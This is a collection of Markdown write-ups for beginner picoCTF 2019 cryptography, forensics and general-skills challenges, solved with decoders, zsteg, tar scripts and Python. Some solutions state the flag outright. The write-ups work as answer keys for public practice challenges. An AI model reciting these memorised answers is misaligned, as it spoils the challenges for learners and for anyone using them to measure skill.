`hxtools` installs as `/usr/bin/rot13` and is a script that invokes the `tr` command more or less as described below. 43 | 44 | The tool from `bsdgames` installs as `/usr/games/rot13` and calls the `caesar` tool (which is also included in the package) but with a rotation of 13. 45 | 46 | After one of these tools have been installed you can run 47 | ```bash 48 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/13] 49 | └─$ echo 'cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}' | rot13 50 | picoCTF{} 51 | ``` 52 | 53 | ### Use the tr tool in Linux 54 | 55 | Alternatively, you can use the `tr` tool like this 56 | ```bash 57 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/13] 58 | └─$ echo 'cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}' | tr 'A-Za-z' 'N-ZA-Mn-za-m' 59 | picoCTF{} 60 | ``` 61 | 62 | For additional information, please see the references below. 63 | 64 | ## References 65 | 66 | - [tr - Linux manual page](https://man7.org/linux/man-pages/man1/tr.1.html) 67 | - [Wikipedia - Modulo](https://en.wikipedia.org/wiki/Modulo) 68 | - [Wikipedia - ROT13](https://en.wikipedia.org/wiki/ROT13) 69 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/Easy1.md: -------------------------------------------------------------------------------- 1 | # Easy1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, Cryptography 11 | Author: ALEX FULTON/DANNY 12 | 13 | Description: 14 | The one time pad can be cryptographically secure, but not when you know the key. 15 | Can you solve this? 16 | 17 | We've given you the encrypted flag, key, and a table to help UFJKXQZQUNB with the key of SOLVECRYPTO. 18 | Can you use this table to solve it?. 19 | 20 | Hints: 21 | 1. Submit your answer in our flag format. For example, if your answer was 'hello', 22 | you would submit 'picoCTF{HELLO}' as the flag. 23 | 2. Please use all caps for the message. 24 | ``` 25 | Challenge link: [https://play.picoctf.org/practice/challenge/43](https://play.picoctf.org/practice/challenge/43) 26 | 27 | ## Solution 28 | 29 | There are several ways to solve this challenge and here are two of them. 30 | 31 | ### Use an online decoder service 32 | 33 | You can use an online decoder service such as [Braingle](https://www.braingle.com/brainteasers/codes/onetimepad.php) or [Rumkin](https://rumkin.com/tools/cipher/one-time-pad/) to solve this challenge. 34 | 35 | In Braingle, use `UFJKXQZQUNB` as `PLAINTEXT / CIPHERTEXT` and `SOLVECRYPTO` as `ONE-TIME PAD`. Click `Decipher` to get the flag. 36 | 37 | In Rumkim, set `Operating mode` to `Decrypt`, set `SOLVECRYPTO` as `The pad` and `UFJKXQZQUNB` as `Text to encode or decode`. 38 | 39 | ### Write a Python decoder 40 | 41 | Alternatively, you can write a Python script to do the decoding 42 | ```python 43 | #!/usr/bin/python 44 | 45 | def decode(chiffer, key): 46 | return chr((ord(chiffer) - ord(key))%26 + ord('A')) 47 | 48 | chiffer = 'UFJKXQZQUNB' 49 | key = 'SOLVECRYPTO' 50 | 51 | result = '' 52 | for pos in range(0, len(chiffer)): 53 | result += decode(chiffer[pos], key[pos]) 54 | print(f"picoCTF{{{result}}}") 55 | ``` 56 | 57 | Then we make sure the script is executable and run it to get the flag 58 | ```bash 59 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Easy1] 60 | └─$ chmod +x decode.py 61 | 62 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Easy1] 63 | └─$ ./decode.py 64 | picoCTF{} 65 | ``` 66 | 67 | For additional information, please see the references below. 68 | 69 | ## References 70 | 71 | - [Wikipedia - Modulo](https://en.wikipedia.org/wiki/Modulo) 72 | - [Wikipedia - One-time pad](https://en.wikipedia.org/wiki/One-time_pad) 73 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/Flags.md: -------------------------------------------------------------------------------- 1 | # Flags 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 200 10 | Tags: picoCTF 2019, Cryptography 11 | Author: DANNY 12 | 13 | Description: 14 | What do the flags mean? 15 | 16 | Hints: 17 | 1. The flag is in the format PICOCTF{} 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/31](https://play.picoctf.org/practice/challenge/31) 20 | 21 | ## Solution 22 | 23 | After some searching I found the [International Signal Flag and Pennant Alphabet](https://christinedemerchant.com/flag-alphabet.html) where each flag corresponds to a character in the alphabet. 24 | 25 | Then it's just a bit of a manual process to construct the flag. 26 | 27 | For additional information, please see the references below. 28 | 29 | ## References 30 | 31 | - [Wikipedia - International maritime signal flags](https://en.wikipedia.org/wiki/International_maritime_signal_flags) 32 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/Mr-Worldwide.md: -------------------------------------------------------------------------------- 1 | # Mr-Worldwide 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 200 10 | Tags: picoCTF 2019, Cryptography 11 | Author: DANNY 12 | 13 | Description: 14 | A musician left us a message. What's it mean? 15 | 16 | Hints: 17 | (None) 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/40](https://play.picoctf.org/practice/challenge/40) 20 | 21 | ## Solution 22 | 23 | Let's start by checking the contents of the message 24 | ```bash 25 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Mr_Worldwide] 26 | └─$ cat message.txt 27 | picoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)} 28 | ``` 29 | 30 | Ah, this could be [longitude](https://en.wikipedia.org/wiki/Longitude) and [latitude](https://en.wikipedia.org/wiki/Latitude) coordinates for places around the world. 31 | 32 | Lets use [Google Maps](https://www.google.com/maps/) to find out what place each coordinate corresponds to. 33 | |Coordinate|City| 34 | |----|----| 35 | |(35.028309, 135.753082)|Kyoto| 36 | |(46.469391, 30.740883)|Odesa| 37 | |(39.758949, -84.191605)|Dayton| 38 | |(41.015137, 28.979530)|Istanbul| 39 | |(24.466667, 54.366669)|Abu Dhabi| 40 | |(3.140853, 101.693207)|Kuala Lumpur| 41 | |etc.|etc.| 42 | 43 | For each city, take the first letter and you have the flag (which should be in CAPITALS). 44 | 45 | For additional information, please see the references below. 46 | 47 | ## References 48 | 49 | - [Wikipedia - Latitude](https://en.wikipedia.org/wiki/Latitude) 50 | - [Wikipedia - Longitude](https://en.wikipedia.org/wiki/Longitude) 51 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | 11 Challenges: 4 | - [13](13.md) 5 | - [caesar](caesar.md) 6 | - [Easy1](Easy1.md) 7 | - [Flags](Flags.md) 8 | - [la cifra de](la_cifra_de.md) 9 | - [miniRSA](miniRSA.md) 10 | - [Mr-Worldwide](Mr-Worldwide.md) 11 | - [rsa-pop-quiz](rsa-pop-quiz.md) 12 | - [Tapping](Tapping.md) 13 | - [The Numbers](The_Numbers.md) 14 | - [waves over lambda](waves_over_lambda.md) 15 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/Tapping.md: -------------------------------------------------------------------------------- 1 | # Tapping 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 200 10 | Tags: picoCTF 2019, Cryptography 11 | Author: DANNY 12 | 13 | Description: 14 | Theres tapping coming in from the wires. What's it saying 15 | 16 | nc jupiter.challenges.picoctf.org 21610. 17 | 18 | Hints: 19 | 1. What kind of encoding uses dashes and dots? 20 | 2. The flag is in the format PICOCTF{} 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/21](https://play.picoctf.org/practice/challenge/21) 23 | 24 | ## Solution 25 | 26 | Tapping, dashes and dots - that ought to mean [morse code](https://en.wikipedia.org/wiki/Morse_code). 27 | 28 | Let's connect to the server and find out 29 | ```bash 30 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/Tapping] 31 | └─$ nc jupiter.challenges.picoctf.org 21610 32 | .--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. ...-- .---- ... ..-. ..- -. ...-- ----. ----- ..--- ----- .---- ----. ..... .---- ----. } 33 | ``` 34 | 35 | Yes, that looks like morse code (apart from the curly braces). 36 | 37 | To decode it we can use an online service such as the one from [onlineconversion](https://www.onlineconversion.com/morse_code.htm). 38 | 39 | Copy and paste the output above to the lower part of the web site under `Convert morse code back into English`. 40 | Then press `Translate!` and the flag will be shown. 41 | 42 | For additional information, please see the references below. 43 | 44 | ## References 45 | 46 | - [Wikipedia - Morse code](https://en.wikipedia.org/wiki/Morse_code) 47 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/The_Numbers.md: -------------------------------------------------------------------------------- 1 | # The Numbers 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 50 10 | Tags: picoCTF 2019, Cryptography 11 | Author: PANDU 12 | 13 | Description: 14 | The numbers... what do they mean? 15 | 16 | Hints: 17 | 1. The flag is in the format PICOCTF{} 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/68](https://play.picoctf.org/practice/challenge/68) 20 | 21 | ## Solution 22 | 23 | There are several ways to solve this challenge and here are some of them. 24 | 25 | ### CyberChef solution 26 | 27 | We can use [CyberChef](https://gchq.github.io/CyberChef/) and the `Magic` recipe to solve this. 28 | 29 | Write the numbers before the '{' character (that is `16 9 3 15 3 20 6`) with spaces in between in the `Input` pane of CyberChef. Don't end with a space! 30 | 31 | Click the 'Magic Wand' icon at the `Output` pane. 32 | If you don't get an icon, you need to type 'magic' in the `Operations` search bar, then drag and drop it to the `Recipe` and press `BAKE`. 33 | 34 | Cyberchef recognizes the encoding as `A1Z26`. 35 | Unfortunately, CyberChef can't handle the '{' and '}' characters so you need to leave them out. 36 | 37 | Then add the rest of the number in the `Input` pane (`20 8 5 14 21 13 2 5 18 19 13 1 19 15 14`). 38 | 39 | Finally, add the `To Upper case` recipe as instructed in the hint. 40 | 41 | You need to manually add the '{' and '}' characters before submitting the flag. 42 | 43 | ### Use an online A1Z26 decoder service 44 | 45 | You can also use an online A1Z26 decoder service such as [Boxentriq](https://www.boxentriq.com/code-breaking/a1z26). 46 | 47 | Add the numbers in the `Numbers` text field and you get the result in the `Letters` text field. 48 | 49 | Again, you need to add the '{' and '}' characters before submitting the flag. 50 | 51 | ### Write a Python decoder 52 | 53 | Alternatively, you can write a Python script to do the decoding 54 | ```python 55 | #!/usr/bin/python 56 | 57 | import string 58 | 59 | ALPHABET = string.ascii_uppercase 60 | 61 | enc_flag = "16 9 3 15 3 20 6 { 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14 }".split() 62 | 63 | flag = '' 64 | for num in enc_flag: 65 | if num.isnumeric(): 66 | flag += ALPHABET[int(num)-1] 67 | else: 68 | flag += num 69 | print(flag) 70 | ``` 71 | 72 | Then we make sure the script is executable and run it to get the flag 73 | ```bash 74 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/The_Numbers] 75 | └─$ chmod +x decode.py 76 | 77 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Cryptography/The_Numbers] 78 | └─$ ./decode.py 79 | PICOCTF{} 80 | ``` 81 | 82 | For additional information, please see the references below. 83 | 84 | ## References 85 | 86 | - [A1Z26 Cipher (What it is and How to Teach Your Kids)](https://dadstuffsite.com/a1z26-cipher-what-it-is-and-how-to-teach-your-kids/) 87 | -------------------------------------------------------------------------------- /picoCTF_2019/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | 12 Challenges: 4 | - [extensions](extensions.md) 5 | - [Glory of the Garden](Glory_of_the_Garden.md) 6 | - [Investigative Reversing 0](Investigative_Reversing_0.md) 7 | - [Investigative Reversing 1](Investigative_Reversing_1.md) 8 | - [like1000](like1000.md) 9 | - [m00nwalk](m00nwalk.md) 10 | - [m00nwalk2](m00nwalk2.md) 11 | - [shark on wire 1](shark_on_wire_1.md) 12 | - [shark on wire 2](shark_on_wire_2.md) 13 | - [So Meta](So_Meta.md) 14 | - [What Lies Within](What_Lies_Within.md) 15 | - [WhitePages](WhitePages.md) 16 | -------------------------------------------------------------------------------- /picoCTF_2019/Forensics/What_Lies_Within.md: -------------------------------------------------------------------------------- 1 | # What Lies Within 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 150 10 | Tags: picoCTF 2019, Forensics 11 | Author: JULIO/DANNY 12 | 13 | Description: 14 | There's something in the building. Can you retrieve the flag? 15 | 16 | Hints: 17 | 1. There is data encoded somewhere... there might be an online decoder. 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/74](https://play.picoctf.org/practice/challenge/74) 20 | 21 | ## Solution 22 | 23 | There are several ways to solve this challenge and here are two of them. 24 | 25 | ### Using an online service 26 | 27 | We can use [stylesuxx steganography online](http://stylesuxx.github.io/steganography/#decode) service to solve this. 28 | 29 | Click `Choose File` and select the file. Then press the `Decode` button to get the flag. 30 | 31 | ### Using zsteg 32 | 33 | We can also use [zsteg](https://github.com/zed-0xff/zsteg) to solve this 34 | ```bash 35 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/What_Lies_Within] 36 | └─$ zsteg buildings.png 37 | b1,r,lsb,xy .. text: "^5>R5YZrG" 38 | b1,rgb,lsb,xy .. text: "picoCTF{}" <----- Here 39 | b1,abgr,msb,xy .. file: PGP Secret Sub-key - 40 | b2,b,lsb,xy .. text: "XuH}p#8Iy=" 41 | b3,abgr,msb,xy .. text: "t@Wp-_tH_v\r" 42 | b4,r,lsb,xy .. text: "fdD\"\"\"\" " 43 | b4,r,msb,xy .. text: "%Q#gpSv0c05" 44 | b4,g,lsb,xy .. text: "fDfffDD\"\"" 45 | b4,g,msb,xy .. text: "f\"fff\"\"DD" 46 | b4,b,lsb,xy .. text: "\"$BDDDDf" 47 | b4,b,msb,xy .. text: "wwBDDDfUU53w" 48 | b4,rgb,msb,xy .. text: "dUcv%F#A`" 49 | b4,bgr,msb,xy .. text: " V\"c7Ga4" 50 | b4,abgr,msb,xy .. text: "gOC_$_@o" 51 | ``` 52 | 53 | For additional information, please see the references below. 54 | 55 | ## References 56 | 57 | - [Wikipedia - Steganography](https://en.wikipedia.org/wiki/Steganography) 58 | - [zsteg](https://github.com/zed-0xff/zsteg) 59 | -------------------------------------------------------------------------------- /picoCTF_2019/Forensics/extensions.md: -------------------------------------------------------------------------------- 1 | # extensions 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 150 10 | Tags: picoCTF 2019, Forensics 11 | Author: SANJAY C/DANNY 12 | 13 | Description: 14 | This is a really weird text file TXT? Can you find the flag? 15 | 16 | Hints: 17 | 1. How do operating systems know what kind of file it is? (It's not just the ending! 18 | 2. Make sure to submit the flag as picoCTF{XXXXX} 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/52](https://play.picoctf.org/practice/challenge/52) 21 | 22 | ## Solution 23 | 24 | Let's start by checking the file with `file`. 25 | ```bash 26 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Extensions] 27 | └─$ file flag.txt 28 | flag.txt: PNG image data, 1697 x 608, 8-bit/color RGB, non-interlaced 29 | ``` 30 | 31 | Ah, it's a PNG picture file, not a text file. 32 | 33 | To view the flag use a tool such as `eog` of `feh`. 34 | 35 | For additional information, please see the references below. 36 | 37 | ## References 38 | 39 | - [file - Linux manual page](https://man7.org/linux/man-pages/man1/file.1.html) 40 | - [Wikipedia - Filename extension](https://en.wikipedia.org/wiki/Filename_extension) 41 | -------------------------------------------------------------------------------- /picoCTF_2019/Forensics/like1000.md: -------------------------------------------------------------------------------- 1 | # like1000 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 250 10 | Tags: picoCTF 2019, Forensics 11 | Author: DANNY 12 | 13 | Description: 14 | This .tar file got tarred a lot. 15 | 16 | Hints: 17 | 1. Try and script this, it'll save you a lot of time 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/81](https://play.picoctf.org/practice/challenge/81) 20 | 21 | ## Solution 22 | 23 | Let's start by untaring the file 24 | ```bash 25 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000] 26 | └─$ tar xfv 1000.tar 27 | 999.tar 28 | filler.txt 29 | ``` 30 | 31 | Hhm, there will probably be 1000 files but let's verify the next step as well 32 | ```bash 33 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000] 34 | └─$ tar xfv 999.tar 35 | 998.tar 36 | filler.txt 37 | ``` 38 | 39 | Yes, let's script this as suggested in the hint 40 | ```bash 41 | #!/bin/bash 42 | 43 | for i in $(seq 1000 -1 1) 44 | do 45 | tar xvf $i.tar 46 | rm filler.txt 47 | rm $i.tar 48 | done 49 | ``` 50 | 51 | Then we make sure the script is executable and run it 52 | ```bash 53 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000] 54 | └─$ chmod +x unpack.sh 55 | 56 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/Like1000] 57 | └─$ ./unpack.sh 58 | 999.tar 59 | filler.txt 60 | 998.tar 61 | filler.txt 62 | 997.tar 63 | filler.txt 64 | 996.tar 65 | filler.txt 66 | 995.tar 67 | filler.txt 68 | <---snip---> 69 | 3.tar 70 | filler.txt 71 | 2.tar 72 | filler.txt 73 | 1.tar 74 | filler.txt 75 | flag.png 76 | filler.txt 77 | ``` 78 | 79 | The unpacking will take a few minutes. 80 | 81 | To view the flag use a tool such as `eog` of `feh`. 82 | 83 | For additional information, please see the references below. 84 | 85 | ## References 86 | 87 | - [tar - Linux manual page](https://man7.org/linux/man-pages/man1/tar.1.html) 88 | - [Bash seq and range](https://linuxhint.com/bash_range/) 89 | -------------------------------------------------------------------------------- /picoCTF_2019/Forensics/m00nwalk.md: -------------------------------------------------------------------------------- 1 | # m00nwalk 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 250 10 | Tags: picoCTF 2019, Forensics 11 | Author: JOON 12 | 13 | Description: 14 | Decode this message from the moon. 15 | 16 | Hints: 17 | 1. How did pictures from the moon landing get sent back to Earth? 18 | 2. What is the CMU mascot?, that might help select a RX option 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/26](https://play.picoctf.org/practice/challenge/26) 21 | 22 | ## Solution 23 | 24 | After some googling I understood that this is [SSTV (Slow-scan television)](https://en.wikipedia.org/wiki/Slow-scan_television) and there is a [SSTV Deocoder](https://github.com/colaclanth/sstv) available. 25 | 26 | After installing the decoder we run it like this 27 | ```bash 28 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/M00nwalk] 29 | └─$ sstv -d message.wav -o moonwalk_result.png 30 | [sstv] Searching for calibration header... Found! 31 | [sstv] Detected SSTV mode Scottie 1 32 | [sstv] Decoding image... [####################################################################################################] 100% 33 | [sstv] Drawing image data... 34 | [sstv] ...Done! 35 | ``` 36 | 37 | The program automatically detects the SSTV mode as `Scottie 1` for us. 38 | 39 | Then we just view the resulting image 40 | ```bash 41 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Forensics/M00nwalk] 42 | └─$ eog moonwalk_result.png & 43 | ``` 44 | 45 | Rotate the picture twice and then you can see the flag more easily. 46 | 47 | For additional information, please see the references below. 48 | 49 | ## References 50 | 51 | - [Wikipedia - Slow-scan television](https://en.wikipedia.org/wiki/Slow-scan_television) 52 | - [SSTV Decoder](https://github.com/colaclanth/sstv) 53 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/2Warm.md: -------------------------------------------------------------------------------- 1 | # 2Warm 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 50 10 | Tags: picoCTF 2019, General Skills 11 | Author: SANJAY C/DANNY TUNITIS 12 | 13 | Description: 14 | Can you convert the number 42 (base 10) to binary (base 2)? 15 | 16 | Hints: 17 | 1. Submit your answer in our competition's flag format. For example, if your answer was '11111', 18 | you would submit 'picoCTF{11111}' as the flag. 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/86](https://play.picoctf.org/practice/challenge/86) 21 | 22 | ## Solution 23 | 24 | ### Convert in Python 25 | 26 | We can use an interactive Python session to do the work for us with the [bin function](https://docs.python.org/3/library/functions.html#bin) 27 | ```bash 28 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/2Warm] 29 | └─$ python 30 | Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux 31 | Type "help", "copyright", "credits" or "license" for more information. 32 | >>> print('picoCTF{' + bin(42)[2:] + '}') 33 | picoCTF{101010} 34 | >>> exit() 35 | ``` 36 | 37 | ### Convert with bc 38 | 39 | Alternatively, we can use the tool `bc` to do the convertion. Install it with `sudo apt install bc` if it isn't installed already. 40 | ```bash 41 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/2Warm] 42 | └─$ echo "obase=2; 42" | bc 43 | 101010 44 | ``` 45 | In this case you need to construct the complete flag manually. 46 | 47 | For additional information, please see the references below. 48 | 49 | ## References 50 | 51 | - [Wikipedia - Binary number](https://en.wikipedia.org/wiki/Binary_number) 52 | - [Python - Slicing Strings](https://www.w3schools.com/python/python_strings_slicing.asp) 53 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/Bases.md: -------------------------------------------------------------------------------- 1 | # Bases 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, General Skills 11 | Author: SANJAY C/DANNY T 12 | 13 | Description: 14 | What does this bDNhcm5fdGgzX3IwcDM1 mean? 15 | 16 | I think it has something to do with bases. 17 | 18 | Hints: 19 | 1. Submit your answer in our flag format. For example, if your answer was 'hello', 20 | you would submit 'picoCTF{hello}' as the flag. 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/67](https://play.picoctf.org/practice/challenge/67) 23 | 24 | ## Solution 25 | 26 | This is [Base64 encoding](https://en.wikipedia.org/wiki/Base64) and there are several ways to decode it. 27 | 28 | ### CyberChef solution 29 | 30 | We can use [CyberChef](https://gchq.github.io/CyberChef/) and the `Base64` recipe to decode it. 31 | Type 'base64' in the `Operations` search bar, then drag and drop `From Base64` to the `Recipe` pane. 32 | Then copy and paste `bDNhcm5fdGgzX3IwcDM1` to the `Input` pane. 33 | Finally, press `BAKE` if you don't have `Auto Bake` selected already. 34 | The result is shown in the `Output` pane. 35 | 36 | To get the full flag you need to add the 'picoCTF{' and '}' parts as instructed in the hint. 37 | 38 | ### Use the base64 commandline tool 39 | 40 | Alternatively, you can use the `base64` tool like this 41 | ```bash 42 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Bases] 43 | └─$ echo 'bDNhcm5fdGgzX3IwcDM1' | base64 -d 44 | l3arn_ 45 | ``` 46 | 47 | Again, you need to add the 'picoCTF{' and '}' parts to get the full flag. 48 | 49 | ### Write a Python script 50 | 51 | Of course, you can always write a Python script to decode it 52 | ```python 53 | #!/usr/bin/python 54 | 55 | from base64 import b64decode 56 | 57 | enc = 'bDNhcm5fdGgzX3IwcDM1' 58 | 59 | decoded = b64decode(enc).decode() 60 | print(f"picoCTF{{{decoded}}}") 61 | ``` 62 | 63 | Then we make sure the script is executable and run it to get the flag 64 | ```bash 65 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Bases] 66 | └─$ chmod +x decode.py 67 | 68 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Bases] 69 | └─$ ./decode.py 70 | picoCTF{} 71 | ``` 72 | 73 | For additional information, please see the references below. 74 | 75 | ## References 76 | 77 | - [Wikipedia - Base64](https://en.wikipedia.org/wiki/Base64) 78 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/First_Grep.md: -------------------------------------------------------------------------------- 1 | # First Grep 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, General Skills 11 | Author: ALEX FULTON/DANNY TUNITIS 12 | 13 | Description: 14 | Can you find the flag in file? 15 | 16 | This would be really tedious to look through manually, something tells me there is a better way. 17 | 18 | Hints: 19 | 1. grep tutorial 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/85](https://play.picoctf.org/practice/challenge/85) 22 | 23 | ## Solution 24 | 25 | This is basically a very easy tutorial for `grep` 26 | ```bash 27 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/First_Grep] 28 | └─$ grep picoCTF file 29 | picoCTF{} 30 | ``` 31 | 32 | For additional information, please see the references below. 33 | 34 | ## References 35 | 36 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 37 | - [Grep and Regular Expressions!](https://ryanstutorials.net/linuxtutorial/grep.php) 38 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/Lets_Warm_Up.md: -------------------------------------------------------------------------------- 1 | # Lets Warm Up 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 50 10 | Tags: picoCTF 2019, General Skills 11 | Author: SANJAY C/DANNY TUNITIS 12 | 13 | Description: 14 | If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII? 15 | 16 | Hints: 17 | 1. Submit your answer in our flag format. For example, if your answer was 'hello', 18 | you would submit 'picoCTF{hello}' as the flag. 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/22](https://play.picoctf.org/practice/challenge/22) 21 | 22 | ## Solution 23 | 24 | We can either manually lookup the answer is an [ASCII table](https://www.ascii-code.com/) or use an interactive Python session to do the work for us with the [chr function](https://docs.python.org/3/library/functions.html#chr) 25 | ```bash 26 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Lets_Warm_Up] 27 | └─$ python 28 | Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux 29 | Type "help", "copyright", "credits" or "license" for more information. 30 | >>> print('picoCTF{' + chr(0x70) + '}') 31 | picoCTF{p} 32 | >>> exit() 33 | ``` 34 | 35 | For additional information, please see the references below. 36 | 37 | ## References 38 | 39 | - [Wikipedia - ASCII](https://en.wikipedia.org/wiki/ASCII) 40 | - [ASCII Table](https://www.ascii-code.com/) 41 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | 12 Challenges: 4 | - [1_wanna_b3_a_r0ck5tar](1_wanna_b3_a_r0ck5tar.md) 5 | - [2Warm](2Warm.md) 6 | - [Based](Based.md) 7 | - [Bases](Bases.md) 8 | - [First Grep](First_Grep.md) 9 | - [flag_shop](flag_shop.md) 10 | - [Lets Warm Up](Lets_Warm_Up.md) 11 | - [mus1c](mus1c.md) 12 | - [plumbing](plumbing.md) 13 | - [strings it](strings_it.md) 14 | - [Warmed Up](Warmed_Up.md) 15 | - [what's a net cat?](whats_a_net_cat.md) 16 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/Warmed_Up.md: -------------------------------------------------------------------------------- 1 | # Warmed Up 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 50 10 | Tags: picoCTF 2019, General Skills 11 | Author: SANJAY C/DANNY TUNITIS 12 | 13 | Description: 14 | What is 0x3D (base 16) in decimal (base 10)? 15 | 16 | Hints: 17 | 1. Submit your answer in our flag format. For example, if your answer was '22', 18 | you would submit 'picoCTF{22}' as the flag. 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/58](https://play.picoctf.org/practice/challenge/58) 21 | 22 | ## Solution 23 | 24 | ### Convert in Python 25 | 26 | We can use an interactive Python session to do the work for us with the [str function](https://docs.python.org/3/library/functions.html#func-str) and the fact that Python understands [hexadecimal numbers](https://en.wikipedia.org/wiki/Hexadecimal) 27 | ```bash 28 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Warmed_Up] 29 | └─$ python 30 | Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux 31 | Type "help", "copyright", "credits" or "license" for more information. 32 | >>> print('picoCTF{' + str(0x3d) + '}') 33 | picoCTF{61} 34 | >>> exit() 35 